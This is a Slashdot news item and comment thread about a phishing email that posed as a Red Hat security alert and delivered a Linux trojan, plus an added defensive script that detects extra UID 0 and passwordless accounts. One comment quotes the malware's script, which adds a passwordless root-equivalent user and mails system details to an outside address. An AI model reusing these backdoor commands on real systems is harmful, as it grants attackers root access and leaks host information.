Beware 'Fedora-Redhat' Fake Security Alert
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official-sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a user's home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
And how much you want to bet that the server was already hacked, and the real owner of the server is going to have to foot the bill?
What a coincidence - I just analysed the same thing, having seen it through Full-Disclosure. Here's the critical section:
/tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null /tmp/mama
echo "Inca un root frate belea: " >>
adduser -g 0 -u 0 -o bash >>
passwd -d bash >>
ifconfig >>
uname -a >>
uptime >>
sshd >>
echo "user bash stii tu" >>
cat
rm -rf
In other words, it'll create a root-equivalent user called 'bash' and mail some system info to root@addlebrain.com.
TANSTAAFI: There Ain't No Such Thing As A Free iPod.
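The analysis above boils down to two host-level artifacts a defender can look for: a second account with UID 0 (from "adduser -g 0 -u 0 -o bash") and an account whose password field has been emptied (from "passwd -d bash"). The script below is an added example, not code from the Slashdot post or from the malware it quotes; it checks passwd- and shadow-format files for both conditions and runs against constructed sample data so it can be tried offline. The helper names and the sample entries are assumptions made for this illustration.

```shell
#!/bin/sh
# Added example (not from the original post or the quoted backdoor).
# Two defensive checks for the effects described in the comment above:
#   1. accounts other than "root" that carry UID 0 (root-equivalent logins)
#   2. accounts whose shadow password field is empty (no password required)
# Both take a file path so they can be run on /etc/passwd and /etc/shadow
# on a live host, or on the constructed sample files below.

# Print every username with UID 0 except "root" from a passwd-format file.
find_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print every username whose password field is empty from a shadow-format file.
find_empty_passwords() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Constructed sample data (hypothetical hashes) reproducing what the quoted
# backdoor would leave behind: a "bash" account with UID 0 and no password.
SAMPLE_PASSWD=$(mktemp)
SAMPLE_SHADOW=$(mktemp)
trap 'rm -f "$SAMPLE_PASSWD" "$SAMPLE_SHADOW"' EXIT

cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bash:x:0:0::/home/bash:/bin/bash
EOF

cat > "$SAMPLE_SHADOW" <<'EOF'
root:$6$placeholderhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$6$placeholderhash2:19000:0:99999:7:::
bash::19000:0:99999:7:::
EOF

# On a real system (as root): find_extra_uid0 /etc/passwd
#                              find_empty_passwords /etc/shadow
echo "Accounts sharing UID 0 with root:"
find_extra_uid0 "$SAMPLE_PASSWD"
echo "Accounts with an empty password field:"
find_empty_passwords "$SAMPLE_SHADOW"
```

Both checks are cheap enough to run from cron or a configuration-audit job; any output from either is worth an immediate look, since a legitimately configured system has exactly one UID 0 account and no empty shadow entries.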